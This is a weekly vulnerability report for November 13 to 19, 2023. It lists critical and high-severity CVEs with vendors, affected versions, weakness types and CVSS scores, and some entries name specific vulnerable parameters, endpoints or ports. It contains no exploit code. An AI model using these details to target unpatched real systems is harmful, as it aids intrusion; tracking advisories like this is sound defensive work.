Weekly Vulnerabilities Reports > November 13 to 19, 2023

Overview

724 new vulnerabilities were reported during this period, including 66 critical vulnerabilities and 335 high severity vulnerabilities. This weekly summary reports vulnerabilities in 1890 products from 274 vendors including Intel, Adobe, Microsoft, AMD, and Siemens. Vulnerabilities are notably categorized as "Cross-site Scripting", "Cross-Site Request Forgery (CSRF)", "Out-of-bounds Read", "Out-of-bounds Write", and "SQL Injection".

  • 472 reported vulnerabilities are remotely exploitable.
  • 183 reported vulnerabilities are related to weaknesses in OWASP Top Ten.
  • 411 reported vulnerabilities are exploitable by an anonymous user.
  • Intel has the most reported vulnerabilities, with 100 reported vulnerabilities.
  • Silabs has the most reported critical vulnerabilities, with 6 reported vulnerabilities.

Summary dashboard (counts not captured in this extract): total vulnerabilities; critical, high, medium and low risk vulnerabilities; remotely exploitable; locally exploitable; exploit available; exploitable anonymously; affecting web application.

Vulnerability Details

The following table lists reported vulnerabilities for the period covered by this report:


66 Critical Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-15 CVE-2023-48365 Qlik HTTP Request Smuggling vulnerability in Qlik Sense

Qlik Sense Enterprise for Windows before August 2023 Patch 2 allows unauthenticated remote code execution, aka QB-21683.

9.9
2023-11-18 CVE-2023-4214 Apppresser Weak Password Recovery Mechanism for Forgotten Password vulnerability in Apppresser

The AppPresser plugin for WordPress is vulnerable to unauthorized password resets in versions up to, and including 4.2.5.

9.8
2023-11-18 CVE-2023-43177 Crushftp Improper Control of Dynamically-Managed Code Resources vulnerability in Crushftp

CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.

9.8
2023-11-18 CVE-2023-48028 Kodcloud Improper Restriction of Excessive Authentication Attempts vulnerability in Kodcloud Kodbox 1.46.01

kodbox 1.46.01 has a security flaw that enables user enumeration.

9.8
2023-11-17 CVE-2023-6188 GET Simple Code Injection vulnerability in Get-Simple Getsimplecms 3.3.16/3.4.0A

A vulnerability was found in GetSimpleCMS 3.3.16/3.4.0a.

9.8
2023-11-17 CVE-2023-44350 Adobe Deserialization of Untrusted Data vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution.

9.8
2023-11-17 CVE-2023-44351 Adobe Deserialization of Untrusted Data vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution.

9.8
2023-11-17 CVE-2023-44353 Adobe Deserialization of Untrusted Data vulnerability in Adobe Coldfusion

Adobe ColdFusion versions 2023.5 (and earlier) and 2021.11 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in arbitrary code execution.

9.8
2023-11-17 CVE-2023-44324 Adobe Improper Authentication vulnerability in Adobe Framemaker Publishing Server 2020/2022

Adobe FrameMaker Publishing Server versions 2022 and earlier are affected by an Improper Authentication vulnerability that could result in a Security feature bypass.

9.8
2023-11-17 CVE-2023-38316 Opennds Improper Encoding or Escaping of Output vulnerability in Opennds Captive Portal

An issue was discovered in OpenNDS Captive Portal before version 10.1.2.

9.8
2023-11-17 CVE-2023-41101 Opennds Out-of-bounds Write vulnerability in Opennds

An issue was discovered in the captive portal in OpenNDS before version 10.1.3.

9.8
2023-11-17 CVE-2023-48655 Misp Project Unspecified vulnerability in Misp-Project Malware Information Sharing Platform

An issue was discovered in MISP before 2.4.176.

9.8
2023-11-17 CVE-2023-48656 Misp Project Unspecified vulnerability in Misp-Project Malware Information Sharing Platform

An issue was discovered in MISP before 2.4.176.

9.8
2023-11-17 CVE-2023-48657 Misp Project Unspecified vulnerability in Misp-Project Malware Information Sharing Platform

An issue was discovered in MISP before 2.4.176.

9.8
2023-11-17 CVE-2023-48658 Misp Project Unspecified vulnerability in Misp-Project Malware Information Sharing Platform

An issue was discovered in MISP before 2.4.176.

9.8
2023-11-17 CVE-2023-48659 Misp Project Unspecified vulnerability in Misp-Project Malware Information Sharing Platform

An issue was discovered in MISP before 2.4.176.

9.8
2023-11-17 CVE-2023-48648 Concretecms Incorrect Default Permissions vulnerability in Concretecms Concrete CMS

Concrete CMS before 8.5.13 and 9.x before 9.2.2 allows unauthorized access because directories can be created with insecure permissions.

9.8
2023-11-17 CVE-2023-45387 Myprestamodules SQL Injection vulnerability in Myprestamodules Exportproducts

In the module "Product Catalog (CSV, Excel, XML) Export PRO" (exportproducts) in versions up to 5.0.0 from MyPrestaModules for PrestaShop, a guest can perform SQL injection via `exportProduct::_addDataToDb().`

9.8
2023-11-17 CVE-2023-48031 Opensupports Unrestricted Upload of File with Dangerous Type vulnerability in Opensupports 4.11.0

OpenSupports v4.11.0 is vulnerable to Unrestricted Upload of File with Dangerous Type.

9.8
2023-11-17 CVE-2023-48078 Code Projects SQL Injection vulnerability in Code-Projects Simple Crud Functionality 1.0

SQL Injection vulnerability in add.php in Simple CRUD Functionality v1.0 allows attackers to run arbitrary SQL commands via the 'title' parameter.

9.8
2023-11-16 CVE-2023-6014 Lfprojects Unspecified vulnerability in Lfprojects Mlflow

An attacker is able to arbitrarily create an account in MLflow, bypassing any authentication requirement.

9.8
2023-11-16 CVE-2023-6019 RAY Project OS Command Injection vulnerability in RAY Project RAY

A command injection existed in Ray's cpu_profile URL parameter, allowing attackers to execute OS commands on the system running the Ray dashboard remotely without authentication.

9.8
2023-11-16 CVE-2023-6016 H2O Unspecified vulnerability in H2O

An attacker is able to gain remote code execution on a server hosting the H2O dashboard through its POJO model import feature.

9.8
2023-11-16 CVE-2023-6018 Lfprojects OS Command Injection vulnerability in Lfprojects Mlflow

An attacker can overwrite any file on the server hosting MLflow without any authentication.

9.8
2023-11-16 CVE-2023-47213 C First Use of Hard-coded Credentials vulnerability in C-First products

First Corporation's DVRs use a hard-coded password, which may allow a remote unauthenticated attacker to rewrite or obtain the configuration information of the affected device.

9.8
2023-11-16 CVE-2023-47674 C First Missing Authentication for Critical Function vulnerability in C-First products

Missing authentication for critical function vulnerability in First Corporation's DVRs allows a remote unauthenticated attacker to rewrite or obtain the configuration information of the affected device.

9.8
2023-11-16 CVE-2021-35437 Lmxcms SQL Injection vulnerability in Lmxcms 1.4

SQL injection vulnerability in LMXCMS v.1.4 allows an attacker to execute arbitrary code via the TagsAction.class.

9.8
2023-11-16 CVE-2023-47003 Redislabs NULL Pointer Dereference vulnerability in Redislabs Redisgraph 2.12.10

An issue in RedisGraph v.2.12.10 allows an attacker to execute arbitrary code and cause a denial of service via a crafted string in DataBlock_ItemIsDeleted.

9.8
2023-11-15 CVE-2023-41442 Kloudq Improper Authentication vulnerability in Kloudq products

An issue in Kloudq Technologies Limited Tor Equip 1.0, Tor Loco Mini 1.0 through 3.1 allows a remote attacker to execute arbitrary code via a crafted request to the MQTT component.

9.8
2023-11-15 CVE-2023-5245 Combust Path Traversal vulnerability in Combust Mleap 0.18.0/0.23.0

FileUtil.extract() enumerates all zip file entries and extracts each file without validating whether file paths in the archive are outside the intended directory. When creating an instance of TensorflowModel using the saved_model format and an exported TensorFlow model, the apply() function invokes the vulnerable implementation of FileUtil.extract(). Arbitrary file creation can directly lead to code execution.

9.8
2023-11-15 CVE-2023-47445 Phpgurukul SQL Injection vulnerability in PHPgurukul Pre-School Enrollment System 1.0

Pre-School Enrollment version 1.0 is vulnerable to SQL Injection via the username parameter in preschool/admin/ page.

9.8
2023-11-15 CVE-2023-43979 Prestahero SQL Injection vulnerability in Prestahero YBC Blog

ETS Soft ybc_blog before v4.4.0 was discovered to contain a SQL injection vulnerability via the component Ybc_blogBlogModuleFrontController::getPosts().

9.8
2023-11-15 CVE-2023-47308 Activedesign SQL Injection vulnerability in Activedesign Newsletterpop

In the module "Newsletter Popup PRO with Voucher/Coupon code" (newsletterpop) before version 2.6.1 from Active Design for PrestaShop, a guest can perform SQL injection in affected versions.

9.8
2023-11-15 CVE-2023-39335 Ivanti Unspecified vulnerability in Ivanti Endpoint Manager Mobile

A security vulnerability has been identified in EPMM Versions 11.10, 11.9 and 11.8 and older allowing an unauthenticated threat actor to impersonate any existing user during the device enrollment process.

9.8
2023-11-14 CVE-2023-45614 Arubanetworks, HP Classic Buffer Overflow vulnerability in multiple products

There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).

9.8
2023-11-14 CVE-2023-45615 Arubanetworks, HP Classic Buffer Overflow vulnerability in multiple products

There are buffer overflow vulnerabilities in the underlying CLI service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).

9.8
2023-11-14 CVE-2023-45616 Arubanetworks, HP Classic Buffer Overflow vulnerability in multiple products

There is a buffer overflow vulnerability in the underlying AirWave client service that could lead to unauthenticated remote code execution by sending specially crafted packets destined to the PAPI (Aruba's access point management protocol) UDP port (8211).

9.8
2023-11-14 CVE-2023-34060 Vmware Missing Authentication for Critical Function vulnerability in VMWare Cloud Director

VMware Cloud Director Appliance contains an authentication bypass vulnerability in case VMware Cloud Director Appliance was upgraded to 10.5 from an older version. On an upgraded version of VMware Cloud Director Appliance 10.5, a malicious actor with network access to the appliance can bypass login restrictions when authenticating on port 22 (ssh) or port 5480 (appliance management console).

9.8
2023-11-14 CVE-2023-36049 Microsoft Unspecified vulnerability in Microsoft .Net and .Net Framework

.NET, .NET Framework, and Visual Studio Elevation of Privilege Vulnerability

9.8
2023-11-14 CVE-2023-47130 Yiiframework Deserialization of Untrusted Data vulnerability in Yiiframework YII

Yii is an open source PHP web framework.

9.8
2023-11-14 CVE-2022-23820 AMD Improper Input Validation vulnerability in AMD products

Failure to validate the AMD SMM communication buffer may allow an attacker to corrupt the SMRAM potentially leading to arbitrary code execution.

9.8
2023-11-14 CVE-2022-23821 AMD Unspecified vulnerability in AMD products

Improper access control in System Management Mode (SMM) may allow an attacker to write to SPI ROM potentially leading to arbitrary code execution.

9.8
2023-11-14 CVE-2023-20596 AMD Unspecified vulnerability in AMD products

Improper input validation in the SMM Supervisor may allow an attacker with a compromised SMI handler to gain Ring0 access potentially leading to arbitrary code execution.

9.8
2023-11-14 CVE-2023-31273 Intel Improper Privilege Management vulnerability in Intel Data Center Manager

Protection mechanism failure in some Intel DCM software before version 5.2 may allow an unauthenticated user to potentially enable escalation of privilege via network access.

9.8
2023-11-14 CVE-2023-34991 Fortinet SQL Injection vulnerability in Fortinet Fortiwlm

An improper neutralization of special elements used in an SQL command ('SQL injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 and 8.4.0 through 8.4.2 and 8.3.0 through 8.3.2 and 8.2.2 allows an attacker to execute unauthorized code or commands via a crafted HTTP request.

9.8
2023-11-14 CVE-2023-36018 Microsoft Unspecified vulnerability in Microsoft Jupyter 2022.9.110

Visual Studio Code Jupyter Extension Spoofing Vulnerability

9.8
2023-11-14 CVE-2023-36028 Microsoft Unspecified vulnerability in Microsoft products

Microsoft Protected Extensible Authentication Protocol (PEAP) Remote Code Execution Vulnerability

9.8
2023-11-14 CVE-2023-36397 Microsoft Unspecified vulnerability in Microsoft products

Windows Pragmatic General Multicast (PGM) Remote Code Execution Vulnerability

9.8
2023-11-14 CVE-2023-36553 Fortinet OS Command Injection vulnerability in Fortinet Fortisiem

An improper neutralization of special elements used in an OS command ('OS command injection') in Fortinet FortiSIEM version 5.4.0 and 5.3.0 through 5.3.3 and 5.2.5 through 5.2.8 and 5.2.1 through 5.2.2 and 5.1.0 through 5.1.3 and 5.0.0 through 5.0.1 and 4.10.0 and 4.9.0 and 4.7.2 allows an attacker to execute unauthorized code or commands via crafted API requests.

9.8
2023-11-14 CVE-2023-6126 Salesagility Code Injection vulnerability in Salesagility Suitecrm

Code Injection in GitHub repository salesagility/suitecrm prior to 7.14.2, 7.12.14, 8.4.2.

9.8
2023-11-14 CVE-2023-43504 Siemens Classic Buffer Overflow vulnerability in Siemens Comos

A vulnerability has been identified in COMOS (All versions < V10.4.4).

9.8
2023-11-14 CVE-2023-24585 Weston Embedded, Silabs Out-of-bounds Write vulnerability in multiple products

An out-of-bounds write vulnerability exists in the HTTP Server functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-25181 Weston Embedded, Silabs Out-of-bounds Write vulnerability in multiple products

A heap-based buffer overflow vulnerability exists in the HTTP Server functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-27882 Weston Embedded, Silabs Out-of-bounds Write vulnerability in multiple products

A heap-based buffer overflow vulnerability exists in the HTTP Server form boundary functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-28379 Weston Embedded, Silabs Out-of-bounds Write vulnerability in multiple products

A memory corruption vulnerability exists in the HTTP Server form boundary functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-28391 Weston Embedded, Silabs Out-of-bounds Write vulnerability in multiple products

A memory corruption vulnerability exists in the HTTP Server header parsing functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-31247 Weston Embedded, Silabs Out-of-bounds Write vulnerability in multiple products

A memory corruption vulnerability exists in the HTTP Server Host header parsing functionality of Weston Embedded uC-HTTP v3.01.01.

9.8
2023-11-14 CVE-2023-45878 Gibbonedu Unspecified vulnerability in Gibbonedu Gibbon

GibbonEdu Gibbon version 25.0.1 and before allows Arbitrary File Write because rubrics_visualise_saveAjax.phps does not require authentication.

9.8
2023-11-14 CVE-2023-43902 Emsigner Unspecified vulnerability in Emsigner 2.8.7

Incorrect access control in the Forgot Your Password function of EMSigner v2.8.7 allows unauthenticated attackers to access accounts of all registered users, including those with administrator privileges via a crafted password reset token.

9.8
2023-11-13 CVE-2023-6102 Maiwei Safety Production Control Platform Project Unrestricted Upload of File with Dangerous Type vulnerability in Maiwei Safety Production Control Platform Project Maiwei Safety Production Control Platform 4.1

A vulnerability, which was classified as problematic, was found in Maiwei Safety Production Control Platform 4.1.

9.8
2023-11-13 CVE-2023-6099 Szjocat Improper Privilege Management vulnerability in Szjocat Facial Love Cloud Platform 1.0.55.0.0.1

A vulnerability classified as critical has been found in Shenzhen Youkate Industrial Facial Love Cloud Payment System up to 1.0.55.0.0.1.

9.8
2023-11-15 CVE-2023-48224 Ethyca Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Ethyca Fides

Fides is an open-source privacy engineering platform for managing the fulfillment of data privacy requests in a runtime environment, and the enforcement of privacy regulations in code.

9.1
2023-11-15 CVE-2023-47678 Asus Unspecified vulnerability in Asus Rt-Ac87U Firmware

An improper access control vulnerability exists in RT-AC87U all versions.

9.1
2023-11-15 CVE-2023-39337 Ivanti Unspecified vulnerability in Ivanti Endpoint Manager Mobile

A security vulnerability in EPMM Versions 11.10, 11.9 and 11.8 and older allows a threat actor with knowledge of an enrolled device identifier to access and extract sensitive information, including device and environment configuration details, as well as secrets.

9.1
2023-11-14 CVE-2023-25603 Fortinet Overly Permissive Cross-domain Whitelist vulnerability in Fortinet Fortiadc and Fortiddos-F

A permissive cross-domain policy with untrusted domains vulnerability in Fortinet FortiADC 7.1.0 - 7.1.1, FortiDDoS-F 6.3.0 - 6.3.4 and 6.4.0 - 6.4.1 allows an unauthorized attacker to carry out privileged actions and retrieve sensitive information via crafted web requests.

9.1
2023-11-14 CVE-2023-44373 Siemens Injection vulnerability in Siemens products

Affected devices do not properly sanitize an input field.

9.1

335 High Vulnerabilities

DATE CVE VENDOR VULNERABILITY CVSS
2023-11-18 CVE-2023-25985 Tooltips Unspecified vulnerability in Tooltips Wordpress Tooltips

Cross-Site Request Forgery (CSRF) vulnerability in Tomas | Docs | FAQ | Premium Support WordPress Tooltips. This issue affects WordPress Tooltips: from n/a through 8.2.5.

8.8
2023-11-18 CVE-2023-28780 Yoast Cross-Site Request Forgery (CSRF) vulnerability in Yoast Local SEO

Cross-Site Request Forgery (CSRF) vulnerability in Yoast Yoast Local Premium. This issue affects Yoast Local Premium: from n/a through 14.8.

8.8
2023-11-18 CVE-2023-31075 Ciphercoin Cross-Site Request Forgery (CSRF) vulnerability in Ciphercoin Easy Hide Login 1.0.8

Cross-Site Request Forgery (CSRF) vulnerability in Arshid Easy Hide Login. This issue affects Easy Hide Login: from n/a through 1.0.8.

8.8
2023-11-18 CVE-2023-31089 Webternsolutions Cross-Site Request Forgery (CSRF) vulnerability in Webternsolutions Video XML Sitemap Generator

Cross-Site Request Forgery (CSRF) vulnerability in Tradebooster Video XML Sitemap Generator. This issue affects Video XML Sitemap Generator: from n/a through 1.0.0.

8.8
2023-11-18 CVE-2023-32245 Wpdeveloper Cross-Site Request Forgery (CSRF) vulnerability in Wpdeveloper Essential Addons for Elementor 5.4.8

Cross-Site Request Forgery (CSRF) vulnerability in WPDeveloper Essential Addons for Elementor Pro. This issue affects Essential Addons for Elementor Pro: from n/a through 5.4.8.

8.8
2023-11-18 CVE-2023-32504 Kaine Cross-Site Request Forgery (CSRF) vulnerability in Kaine Wise Chat

Cross-Site Request Forgery (CSRF) vulnerability in Kainex Wise Chat. This issue affects Wise Chat: from n/a through 3.1.3.

8.8
2023-11-18 CVE-2023-32514 Himanshuparashar Cross-Site Request Forgery (CSRF) vulnerability in Himanshuparashar Google Site Verification Plugin Using Meta TAG 1.2

Cross-Site Request Forgery (CSRF) vulnerability in Himanshu Parashar Google Site Verification plugin using Meta Tag. This issue affects Google Site Verification plugin using Meta Tag: from n/a through 1.2.

8.8
2023-11-18 CVE-2023-41129 Patreon Unspecified vulnerability in Patreon Wordpress

Cross-Site Request Forgery (CSRF) vulnerability in Patreon Patreon WordPress. This issue affects Patreon WordPress: from n/a through 1.8.6.

8.8
2023-11-18 CVE-2023-47243 Codemshop Cross-Site Request Forgery (CSRF) vulnerability in Codemshop Mshop MY Site 1.1.6

Cross-Site Request Forgery (CSRF) vulnerability in CodeMShop ???? ????? – MSHOP MY SITE. This issue affects ???? ????? – MSHOP MY SITE: from n/a through 1.1.6.

8.8
2023-11-18 CVE-2023-47519 Wcproducttable Cross-Site Request Forgery (CSRF) vulnerability in Wcproducttable Woocommerce Product Table Lite

Cross-Site Request Forgery (CSRF) vulnerability in WC Product Table WooCommerce Product Table Lite. This issue affects WooCommerce Product Table Lite: from n/a through 2.6.2.

8.8
2023-11-18 CVE-2023-47531 Droitthemes Cross-Site Request Forgery (CSRF) vulnerability in Droitthemes Droit Dark Mode

Cross-Site Request Forgery (CSRF) vulnerability in DroitThemes Droit Dark Mode. This issue affects Droit Dark Mode: from n/a through 1.1.2.

8.8
2023-11-18 CVE-2023-47551 Rednao Cross-Site Request Forgery (CSRF) vulnerability in Rednao Donations Made Easy - Smart Donations

Cross-Site Request Forgery (CSRF) vulnerability in RedNao Donations Made Easy – Smart Donations. This issue affects Donations Made Easy – Smart Donations: from n/a through 4.0.12.

8.8
2023-11-18 CVE-2023-47552 Webdevocean Cross-Site Request Forgery (CSRF) vulnerability in Webdevocean Image Hover Effects 5.3

Cross-Site Request Forgery (CSRF) vulnerability in Labib Ahmed Image Hover Effects – WordPress Plugin. This issue affects Image Hover Effects – WordPress Plugin: from n/a through 5.5.

8.8
2023-11-18 CVE-2023-47553 Userlocal Cross-Site Request Forgery (CSRF) vulnerability in Userlocal Userheat Plugin

Cross-Site Request Forgery (CSRF) vulnerability in User Local Inc UserHeat Plugin. This issue affects UserHeat Plugin: from n/a through 1.1.6.

8.8
2023-11-18 CVE-2023-47556 Jamesmehorter Cross-Site Request Forgery (CSRF) vulnerability in Jamesmehorter Device Theme Switcher

Cross-Site Request Forgery (CSRF) vulnerability in James Mehorter Device Theme Switcher. This issue affects Device Theme Switcher: from n/a through 3.0.2.

8.8
2023-11-18 CVE-2023-47644 Metagauss Cross-Site Request Forgery (CSRF) vulnerability in Metagauss Profilegrid

Cross-Site Request Forgery (CSRF) vulnerability in profilegrid ProfileGrid – User Profiles, Memberships, Groups and Communities. This issue affects ProfileGrid – User Profiles, Memberships, Groups and Communities: from n/a through 5.6.6.

8.8
2023-11-18 CVE-2023-47649 Pricelisto Cross-Site Request Forgery (CSRF) vulnerability in Pricelisto Best Restaurant Menu

Cross-Site Request Forgery (CSRF) vulnerability in PriceListo Best Restaurant Menu by PriceListo. This issue affects Best Restaurant Menu by PriceListo: from n/a through 1.3.1.

8.8
2023-11-18 CVE-2023-47650 Petersterling Unspecified vulnerability in Petersterling ADD Local Avatar

Cross-Site Request Forgery (CSRF) vulnerability in Peter Sterling Add Local Avatar. This issue affects Add Local Avatar: from n/a through 12.1.

8.8
2023-11-18 CVE-2023-47651 Wplinkspage Unspecified vulnerability in Wplinkspage WP Links Page

Cross-Site Request Forgery (CSRF) vulnerability in Robert Macchi WP Links Page. This issue affects WP Links Page: from n/a through 4.9.4.

8.8
2023-11-18 CVE-2023-47655 Wpgov Cross-Site Request Forgery (CSRF) vulnerability in Wpgov Anac XML Bandi DI Gara

Cross-Site Request Forgery (CSRF) vulnerability in Marco Milesi ANAC XML Bandi di Gara. This issue affects ANAC XML Bandi di Gara: from n/a through 7.5.

8.8
2023-11-18 CVE-2023-47664 Plainviewplugins Cross-Site Request Forgery (CSRF) vulnerability in Plainviewplugins Plainview Protect Passwords

Cross-Site Request Forgery (CSRF) vulnerability in edward_plainview Plainview Protect Passwords. This issue affects Plainview Protect Passwords: from n/a through 1.4.

8.8
2023-11-18 CVE-2023-47666 Code Snippets Cross-Site Request Forgery (CSRF) vulnerability in Code Snippets Code Snippets

Cross-Site Request Forgery (CSRF) vulnerability in Code Snippets Pro Code Snippets. This issue affects Code Snippets: from n/a through 3.5.0.

8.8
2023-11-18 CVE-2023-47667 Paymentsplugin Cross-Site Request Forgery (CSRF) vulnerability in Paymentsplugin WP Full Stripe Free 1.6.1

Cross-Site Request Forgery (CSRF) vulnerability in Mammothology WP Full Stripe Free. This issue affects WP Full Stripe Free: from n/a through 7.0.16.

8.8
2023-11-18 CVE-2023-47670 Icansoft Cross-Site Request Forgery (CSRF) vulnerability in Icansoft Korea SNS

Cross-Site Request Forgery (CSRF) vulnerability in Jongmyoung Kim Korea SNS. This issue affects Korea SNS: from n/a through 1.6.3.

8.8
2023-11-18 CVE-2023-47671 Gopiplus Cross-Site Request Forgery (CSRF) vulnerability in Gopiplus Vertical Scroll Recent Registered User

Cross-Site Request Forgery (CSRF) vulnerability in Gopi Ramasamy Vertical scroll recent post. This issue affects Vertical scroll recent post: from n/a through 14.0.

8.8
2023-11-18 CVE-2023-47672 Swashata Cross-Site Request Forgery (CSRF) vulnerability in Swashata WP Category Post List Widget 2.0.3

Cross-Site Request Forgery (CSRF) vulnerability in Swashata WP Category Post List Widget. This issue affects WP Category Post List Widget: from n/a through 2.0.3.

8.8
2023-11-18 CVE-2023-47685 NKB BD Cross-Site Request Forgery (CSRF) vulnerability in Nkb-Bd Preloader Matrix

Cross-Site Request Forgery (CSRF) vulnerability in Lukman Nakib Preloader Matrix. This issue affects Preloader Matrix: from n/a through 2.0.1.

8.8
2023-11-18 CVE-2023-48017 Dreamer CMS Project Cross-Site Request Forgery (CSRF) vulnerability in Dreamer CMS Project Dreamer CMS 4.1.3

Dreamer_cms 4.1.3 is vulnerable to Cross Site Request Forgery (CSRF) via Add permissions to CSRF in Permission Management.

8.8
2023-11-18 CVE-2023-6187 Strangerstudios Unrestricted Upload of File with Dangerous Type vulnerability in Strangerstudios Paid Memberships PRO

The Paid Memberships Pro plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'pmpro_paypalexpress_session_vars_for_user_fields' function in versions up to, and including, 2.12.3.

8.8
2023-11-17 CVE-2023-47757 Aweber Cross-Site Request Forgery (CSRF) vulnerability in Aweber

Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in AWeber AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth allows Accessing Functionality Not Properly Constrained by ACLs, Cross-Site Request Forgery. This issue affects AWeber – Free Sign Up Form and Landing Page Builder Plugin for Lead Generation and Email Newsletter Growth: from n/a through 7.3.9.

8.8
2023-11-17 CVE-2023-39544 NEC Missing Authorization vulnerability in NEC products

CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.1 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.1 and earlier allow an attacker who can log in to the product to execute an arbitrary command.

8.8
2023-11-17 CVE-2023-39545 NEC Files or Directories Accessible to External Parties vulnerability in NEC products

CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.1 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.1 and earlier allow an attacker who can log in to the product to execute an arbitrary command.

8.8
2023-11-17 CVE-2023-39546 NEC Unspecified vulnerability in NEC products

CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.1 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.1 and earlier allow an attacker who can log in to the product to execute an arbitrary command.

8.8
2023-11-17 CVE-2023-39547 NEC Authentication Bypass by Capture-replay vulnerability in NEC products

CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.1 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.1 and earlier allow an attacker who can log in to the product to execute an arbitrary command.

8.8
2023-11-17 CVE-2023-39548 NEC Unrestricted Upload of File with Dangerous Type vulnerability in NEC products

CLUSTERPRO X Ver5.1 and earlier and EXPRESSCLUSTER X 5.1 and earlier, CLUSTERPRO X SingleServerSafe 5.1 and earlier, EXPRESSCLUSTER X SingleServerSafe 5.1 and earlier allow an attacker who can log in to the product to execute an arbitrary command.

8.8
2023-11-16 CVE-2023-47686 Kibokolabs Cross-Site Request Forgery (CSRF) vulnerability in Kibokolabs Arigato Autoresponder and Newsletter

Cross-Site Request Forgery (CSRF) vulnerability in Kiboko Labs Arigato Autoresponder and Newsletter plugin <= 2.7.2.2 versions.

8.8
2023-11-16 CVE-2023-47687 Vjinfotech Cross-Site Request Forgery (CSRF) vulnerability in Vjinfotech WOO Custom and Sequential Order Number

Cross-Site Request Forgery (CSRF) vulnerability in VJInfotech Woo Custom and Sequential Order Number plugin <= 2.6.0 versions.

8.8
2023-11-16 CVE-2023-47688 Alexufo Cross-Site Request Forgery (CSRF) vulnerability in Alexufo Youtube Speedload

Cross-Site Request Forgery (CSRF) vulnerability in Alexufo Youtube SpeedLoad plugin <= 0.6.3 versions.

8.8
2023-11-16 CVE-2023-46214 Splunk XML Injection (aka Blind XPath Injection) vulnerability in Splunk Cloud and Splunk

In Splunk Enterprise versions below 9.0.7 and 9.1.2, Splunk Enterprise does not safely sanitize extensible stylesheet language transformations (XSLT) that users supply.

8.8
2023-11-16 CVE-2023-6022 Prefect Cross-Site Request Forgery (CSRF) vulnerability in Prefect

Cross-Site Request Forgery (CSRF) in GitHub repository prefecthq/prefect prior to 2.16.5.

8.8
2023-11-16 CVE-2023-43275 Dedecms Cross-Site Request Forgery (CSRF) vulnerability in Dedecms 5.7

Cross-Site Request Forgery (CSRF) vulnerability in DedeCMS v5.7 in 110 backend management interface via /catalog_add.php, allows attackers to create crafted web pages due to a lack of verification of the token value of the submitted form.

8.8
2023-11-15 CVE-2023-47444 Opencart Code Injection vulnerability in Opencart 4.0.0.0

An issue discovered in OpenCart 4.0.0.0 to 4.0.2.3 allows authenticated backend users with the common/security write privilege to write arbitrary untrusted data inside config.php and admin/config.php, resulting in remote code execution on the underlying server.

8.8
2023-11-15 CVE-2023-47637 Pimcore SQL Injection vulnerability in Pimcore

Pimcore is an Open Source Data & Experience Management Platform.

8.8
2023-11-15 CVE-2023-5997 Google, Fedoraproject, Debian Use After Free vulnerability in multiple products

Use after free in Garbage Collection in Google Chrome prior to 119.0.6045.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

8.8
2023-11-15 CVE-2023-6112 Google, Debian, Fedoraproject Use After Free vulnerability in multiple products

Use after free in Navigation in Google Chrome prior to 119.0.6045.159 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.

8.8
2023-11-15 CVE-2023-48089 Xuxueli Unspecified vulnerability in Xuxueli Xxl-Job 2.4.0

xxl-job-admin 2.4.0 is vulnerable to Remote Code Execution (RCE) via /xxl-job-admin/jobcode/save.

8.8
2023-11-15 CVE-2023-40923 Myprestamodules SQL Injection vulnerability in Myprestamodules Orders (Csv, Excel) Export

MyPrestaModules ordersexport before v5.0 was discovered to contain multiple SQL injection vulnerabilities at send.php via the key and save_setting parameters.

8.8
2023-11-15 CVE-2023-43582 Zoom Improper Authentication vulnerability in Zoom products

Improper authorization in some Zoom clients may allow an authorized user to conduct an escalation of privilege via network access.

8.8
2023-11-14 CVE-2022-45781 Tenda Out-of-bounds Write vulnerability in Tenda Ax1803 Firmware 1.0.0.1/1.0.0.12890

Buffer Overflow vulnerability in Tenda AX1803 v1.0.0.1_2994 and earlier allows attackers to run arbitrary code via /goform/SetOnlineDevName.

8.8
2023-11-14 CVE-2023-48217 Statamic Unrestricted Upload of File with Dangerous Type vulnerability in Statamic

Statamic is a flat-first, Laravel + Git powered CMS designed for building websites.

8.8
2023-11-14 CVE-2023-36437 Microsoft Unspecified vulnerability in Microsoft Azure Pipelines Agent

Azure DevOps Server Remote Code Execution Vulnerability

8.8
2023-11-14 CVE-2023-47631 Vantage6 Insufficient Verification of Data Authenticity vulnerability in Vantage6

vantage6 is a framework to manage and deploy privacy enhancing technologies like Federated Learning (FL) and Multi-Party Computation (MPC).

8.8
